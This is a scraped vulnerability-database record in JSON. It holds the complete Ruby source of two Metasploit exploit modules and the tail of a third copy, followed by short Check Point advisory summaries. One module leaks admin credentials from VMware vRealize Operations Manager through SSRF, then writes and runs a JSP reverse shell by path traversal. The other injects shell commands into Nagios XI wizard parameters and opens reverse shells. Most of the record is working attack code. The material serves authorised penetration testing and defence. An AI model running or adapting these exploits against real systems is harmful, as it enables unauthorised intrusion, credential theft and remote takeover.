\n'Description' => %q{ \nThis module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth \nfile write (CVE-2021-21983) in VMware vRealize Operations Manager to \nleak admin creds and write/execute a JSP payload. \n \nCVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and \nCVE-2021-21983 affects the /casa/private/config/slice/ha/certificate \nendpoint. Code execution occurs as the \"admin\" Unix user. \n \nThe following vRealize Operations Manager versions are vulnerable: \n \n* 7.0.0 \n* 7.5.0 \n* 8.0.0, 8.0.1 \n* 8.1.0, 8.1.1 \n* 8.2.0 \n* 8.3.0 \n \nVersion 8.3.0 is not exploitable for creds and is therefore not \nsupported by this module. Tested against 8.0.1. \n}, \n'Author' => [ \n'Egor Dimitrenko', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-21975'], # SSRF \n['CVE', '2021-21983'], # File write \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'], \n['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'], \n['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis'] \n], \n'DisclosureDate' => '2021-03-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => 'linux', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, \n'Targets' => [ \n['vRealize Operations Manager < 8.3.0', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SRVPORT' => 8443, \n'SSL' => true, \n'PAYLOAD' => 'java/jsp_shell_reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs \nARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa \n] \n}, \n'Stance' => Stance::Aggressive \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef setup \nsuper \n \n@creds = nil \n \nprint_status('Starting SSRF server...') \nstart_service \nend \n \ndef check \nleak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe \nend \n \ndef exploit \nreturn unless (@creds ||= leak_admin_creds) \n \nwrite_jsp_payload \nexecute_jsp_payload \nend \n \ndef leak_admin_creds \n# \"Comment out\" trailing path using URI fragment syntax, ostensibly \nssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\" \n \nprint_status('Leaking admin creds via SSRF...') \nvprint_status(ssrf_uri) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'), \n'ctype' => 'application/json', \n'data' => [ssrf_uri].to_json \n) \n \nunless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri \nprint_error('Failed to send SSRF request') \nreturn \nend \n \nunless @creds \nprint_error('Failed to leak admin creds') \nreturn \nend \n \nprint_good('Successfully leaked admin creds') \nvprint_status(\"Authorization: #{@creds}\") \n \n@creds \nend \n \ndef on_request_uri(cli, request) \nprint_status(\"#{cli.peerhost} connected to SSRF server!\") \nvprint_line(request.to_s) \n \n@creds ||= request.headers['Authorization'] \nensure \nsend_not_found(cli) \nclose_client(cli) \nend \n \ndef write_jsp_payload \njsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\" \n \nprint_status('Writing JSP payload') \nvprint_status(jsp_path) \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part( \n\"../../../../..#{jsp_path}\", \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n'form-data; name=\"name\"' \n) \nmultipart_form.add_part( \npayload.encoded, \nnil, # Content-Type \nnil, # Content-Transfer-Encoding \n%(form-data; name=\"file\"; filename=\"#{jsp_filename}\") \n) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'), \n'authorization' => @creds, \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n) \n \nunless res&.code == 200 \nfail_with(Failure::NotVulnerable, 'Failed to write JSP payload') \nend \n \nregister_file_for_cleanup(jsp_path) \n \nprint_good('Successfully wrote JSP payload') \nend \n \ndef execute_jsp_payload \njsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename) \n \nprint_status('Executing JSP payload') \nvprint_status(full_uri(jsp_uri)) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => jsp_uri, \n'authorization' => @creds \n) \n \nunless res&.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute JSP payload') \nend \n \nprint_good('Successfully executed JSP payload') \nend \n \ndef jsp_filename \n@jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\" \nend \n \nend \n`\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/162349/vmware_vrops_mgr_ssrf_rce.rb.txt"}], "metasploit": [{"lastseen": "2023-05-27T15:13:13", "description": "This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm configuration wizards that allow an authenticated user to perform remote code execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user. Valid credentials for a Nagios XI user are required. This module has been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-07T20:18:03", "type": "metasploit", "title": "Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298"], "modified": "2023-04-01T08:58:37", "id": "MSF:EXPLOIT-LINUX-HTTP-NAGIOS_XI_CONFIGWIZARDS_AUTHENTICATED_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/nagios_xi_configwizards_authenticated_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::NagiosXi\n include Msf::Exploit::CmdStager\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Nagios XI 5.5.6 to 5.7.5 - ConfigWizards Authenticated Remote Code Exection',\n 'Description' => %q{\n This module exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298, which are\n OS command injection vulnerabilities in the windowswmi, switch, and cloud-vm\n configuration wizards that allow an authenticated user to perform remote code\n execution on Nagios XI versions 5.5.6 to 5.7.5 as the apache user.\n\n Valid credentials for a Nagios XI user are required. This module has\n been successfully tested against official NagiosXI OVAs from 5.5.6-5.7.5.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Matthew Mathur'\n ],\n 'References' => [\n ['CVE', '2021-25296'],\n ['CVE', '2021-25297'],\n ['CVE', '2021-25298'],\n ['URL', 'https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs/blob/main/README.md']\n ],\n 'Platform' => %w[linux unix],\n 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],\n 'Targets' => [\n [\n 'Linux (x86)', {\n 'Arch' => [ ARCH_X86 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Linux (x64)', {\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'linux',\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'CMD', {\n 'Arch' => [ ARCH_CMD ],\n 'Platform' => 'unix',\n # the only reliable payloads against a typical Nagios XI host (CentOS 7 minimal) seem to be cmd/unix/reverse_perl_ssl and cmd/unix/reverse_openssl\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' }\n }\n ]\n ],\n 'Privileged' => false,\n 'DefaultTarget' => 2,\n 'DisclosureDate' => '2021-02-13',\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],\n 'Reliability' => [ REPEATABLE_SESSION ]\n }\n )\n )\n\n register_options [\n OptString.new('TARGET_CVE', [true, 'CVE to exploit (CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298)', 'CVE-2021-25296'])\n ]\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def finish_install\n datastore['FINISH_INSTALL']\n end\n\n def check\n # Authenticate to ensure we can access the NagiosXI version\n auth_result, err_msg, @auth_cookies, @version, @nsp = authenticate(username, password, finish_install, true, true, true)\n case auth_result\n when AUTH_RESULTS[:connection_failed]\n return CheckCode::Unknown(err_msg)\n when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]\n return CheckCode::Detected(err_msg)\n when AUTH_RESULTS[:not_nagios_application]\n return CheckCode::Safe(err_msg)\n end\n\n if @version >= Rex::Version.new('5.5.6') && @version <= Rex::Version.new('5.7.5')\n return CheckCode::Appears\n end\n\n return CheckCode::Safe\n end\n\n def execute_command(cmd, _opts = {})\n if !@nsp || !@auth_cookies # Check to see if we already authenticated during the check\n auth_result, err_msg, @auth_cookies, @version, @nsp = authenticate(username, password, finish_install, true, true, true)\n case auth_result\n when AUTH_RESULTS[:connection_failed]\n return CheckCode::Unknown(err_msg)\n when AUTH_RESULTS[:unexpected_error], AUTH_RESULTS[:not_fully_installed], AUTH_RESULTS[:failed_to_handle_license_agreement], AUTH_RESULTS[:failed_to_extract_tokens], AUTH_RESULTS[:unable_to_obtain_version]\n return CheckCode::Detected(err_msg)\n when AUTH_RESULTS[:not_nagios_application]\n return CheckCode::Safe(err_msg)\n end\n end\n\n # execute payload based on the selected targeted configuration wizard\n url_params = {\n 'update' => 1,\n 'nsp' => @nsp\n }\n # After version 5.5.7, the URL parameter used in CVE-2021-25297 and CVE-2021-25298\n # changes from address to ip_address\n if @version <= Rex::Version.new('5.5.7')\n address_param = 'address'\n else\n address_param = 'ip_address'\n end\n\n # CVE-2021-25296 affects the windowswmi configuration wizard.\n if datastore['TARGET_CVE'] == 'CVE-2021-25296'\n url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'windowswmi',\n 'ip_address' => Array.new(4) { rand(256) }.join('.'),\n 'domain' => Rex::Text.rand_text_alphanumeric(7..15),\n 'username' => Rex::Text.rand_text_alphanumeric(7..20),\n 'password' => Rex::Text.rand_text_alphanumeric(7..20),\n 'plugin_output_len' => Rex::Text.rand_text_numeric(5) + \"; #{cmd};\"\n })\n # CVE-2021-25297 affects the switch configuration wizard.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25297'\n url_params = url_params.merge({\n 'nextstep' => 3,\n 'wizard' => 'switch',\n address_param => Array.new(4) { rand(256) }.join('.') + \"\\\"; #{cmd};\",\n 'snmpopts[snmpcommunity]' => Rex::Text.rand_text_alphanumeric(7..15),\n 'scaninterfaces' => 'on'\n })\n # CVE-2021-25298 affects the cloud-vm configuration wizard, which we can access by\n # specifying the digitalocean option for the wizard parameter.\n elsif datastore['TARGET_CVE'] == 'CVE-2021-25298'\n url_params = url_params.merge({\n address_param => Array.new(4) { rand(256) }.join('.') + \"; #{cmd};\",\n 'nextstep' => 4,\n 'wizard' => 'digitalocean'\n })\n else\n fail_with(Failure::BadConfig, 'Invalid TARGET_CVE: Choose CVE-2021-25296, CVE-2021-25297, or CVE-2021-25298.')\n end\n\n print_status('Sending the payload...')\n # Send the final request. Note that the target is not expected to respond if we get\n # code execution. Therefore, we set the timeout on this request to 0.\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => '/nagiosxi/config/monitoringwizard.php',\n 'cookie' => @auth_cookies,\n 'vars_get' => url_params\n })\n end\n\n def exploit\n if target.arch.first == ARCH_CMD\n execute_command(payload.encoded)\n else\n execute_cmdstager(background: true)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/nagios_xi_configwizards_authenticated_rce.rb", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:13:04", "description": "This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user. The following vRealize Operations Manager versions are vulnerable: * 7.0.0 * 7.5.0 * 8.0.0, 8.0.1 * 8.1.0, 8.1.1 * 8.2.0 * 8.3.0 Version 8.3.0 is not exploitable for creds and is therefore not supported by this module. Tested successfully against 8.0.1, 8.1.0, 8.1.1, and 8.2.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-21T15:42:10", "type": "metasploit", "title": "VMware vRealize Operations (vROps) Manager SSRF RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-05-06T23:30:20", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VROPS_MGR_SSRF_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vrops_mgr_ssrf_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested successfully against 8.0.1, 8.1.0,\n 8.1.1, and 8.2.0.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vrops_mgr_ssrf_rce.rb", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:08", "description": "A remote code execution vulnerability exists in Nagios XI. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "checkpoint_advisories", "title": "Nagios XI Remote Code Execution (CVE-2021-25296; CVE-2021-25297; CVE-2021-25298; CVE-2021-25299)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-25299"], "modified": "2021-03-14T00:00:00", "id": "CPAI-2021-0085", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:30:11", "description": "A command injection vulnerability exists in Apache Airflow. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Apache Airflow Command Injection (CVE-2020-11978; CVE-2020-13927)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13927"], "modified": "2022-01-31T00:00:00", "id": "CPAI-2020-3368", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:53", "description": "A directory traversal vulnerability exists in Aviatrix Controller. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-30T00:00:00", "type": "checkpoint_advisories", "title": "Aviatrix Controller Directory Traversal (CVE-2021-40870)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-12-30T00:00:00", "id": "CPAI-2021-0951", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:28", "description": "An authentication bypass vulnerability exists in October CMS. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2022-02-02T00:00:00", "type": "checkpoint_advisories", "title": "October CMS Authentication Bypass (CVE-2021-32648)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-02-02T00:00:00", "id": "CPAI-2021-1061", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-02-18T07:32:18", "description": "A buffer overflow vulnerability exists in F5 BIG-IP. Successful exploitation of this vulnerability could result in a denial of service or execution of arbitrary code into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-17T00:00:00", "type": "checkpoint_advisories", "title": "F5 BIG-IP Buffer Overflow (CVE-2021-22991)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2022-02-17T00:00:00", "id": "CPAI-2021-1087", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:21", "description": "A command injection vulnerability exists in Node.JS System Information. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-02T00:00:00", "type": "checkpoint_advisories", "title": "Node.JS System Information 